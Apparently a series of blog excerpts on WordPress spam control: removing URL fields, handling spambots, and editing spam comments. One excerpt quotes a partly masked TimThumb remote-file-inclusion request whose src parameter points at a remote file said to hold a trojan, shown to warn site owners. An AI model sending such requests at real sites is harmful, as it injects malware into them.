Removing Website URL from Comment Forms Stops Spammers
Another way to stop spam comments – get rid of the website URL in comment forms. We’ve finally got rid of nearly all spam comments on graphicline.co.za. Although the site was already protected by Project Honeypot, and comments use a CAPTCHA challenge, we were still getting a lot of spam. Instead of switching to RECAPTCHA with it’s more difficult text, we looked for another way to reduce successful spam comments.
The common factor to all spam comments was the inclusion of a homepage URL in the form field. The thinking was; if there’s no field for the URL, then spambots may fail as they can’t finish their job. Without a homepage URL field, manual spammers may be discouraged from posting rubbish as well.
Taking Spam Control to an Extreme Level
We took spam control to a ridiculous level. As an exercise in discovering just how effectively spam can be blocked with WordPress it’s been an interesting exercise. We looked at the 4 main types of spam one is likely to see on their blog; comment spam and trackback spam, spam registrations and finally e-mail spam from contact forms.
The site chosen was our WordPress information site. A few months back a plugin support forum was added to the site, and public registrations allowed. Almost immediately there was a spate of spam registrations – “visitors” registering an account. Most were bots. How do we know? Well, the only link to the registration form is from forum pages, and only a few registration attempts came from one of these referrer pages – the others all arrived at the form directly, without visiting the site at all.
Hackers Using Picasa Spoof for Web Malware
Strange looking referer URLs and GET requests that appear to be Picasa are being used by hackers to find website vulnerabilities to inject malware or spam. Examining the details of the referer reveals something like this example /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.jcibuenos*****.com.ar/2.php (stars replace the actual characters in string for your safety – leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit. The file 2.php contains a trojan horse!
Picasa is of course picasa.google.com, but the similarity can lead the unwary to disregard the source. These strings are typically long, similar in appearance to a Google search request string. Any URL containing this odd string (or similar) should be regarded as extremely suspicious, and the IP should at least be checked for known bad behaviour and blocked from accessing the website. The string is often seen along with WordPress TimThumb exploit attempts.
Spambot – Check the Names and Websites
Spambots getting better? This spammers auto spam-bot message is almost convincing. I had to stop for a moment and think; almost started moving the mouse to find the list of e-mail subscribers when I remembered something – the posted name and website link was not one of the available sign in services (WordPress, Facebook, Twitter), so how did this commenter manage to subscribe by e-mail when leaving a comment. SPAMBOT…
It nearly got published – It is still a bit early for me, I don’t function too well until I have seriously diluted the blood level in my caffeine stream, even the eyes don’t see too well until caffeine overtakes the red cell concentration, and almost missed the “great site dod” intro and the spam terms “cheap” and “viagra”.
Spammers are Losers
It has been a while since I mentioned spam commenters… This blog get’s very little these days since restricting commenting to logged-in visitors only. A vast improvement from the days of finding 50 or more spam-bot or manually generated nonsense in the spam folder.
However, some of the blogs I manage for others get these spam comments. The ones I mention are still small, written by occasional bloggers, and I just take care of formatting, graphics, proofreading and admin tasks on behalf of the authors.
Last week I was doing the rounds of these blogs, checking the comments, and found a number of comments which were complimentary, short remarks even relevant to the topic of the posts concerned, but with outgoing links all over the place. I decided to have a bit of fun with the spammers, and approved their comments – after editing!
The net result – the spammers are all-round losers.
Editing the Spam Comments
First off the links had to go… The rule is simple, links from spammers are bad news, even if “nofollowed” – who knows what dangerous malware is on the linked to page. I really do not want visitors to these blogs to click the link (or even copy and paste to their browser) and end up getting their computers infected with a trojan or virus. So the links were deleted entirely.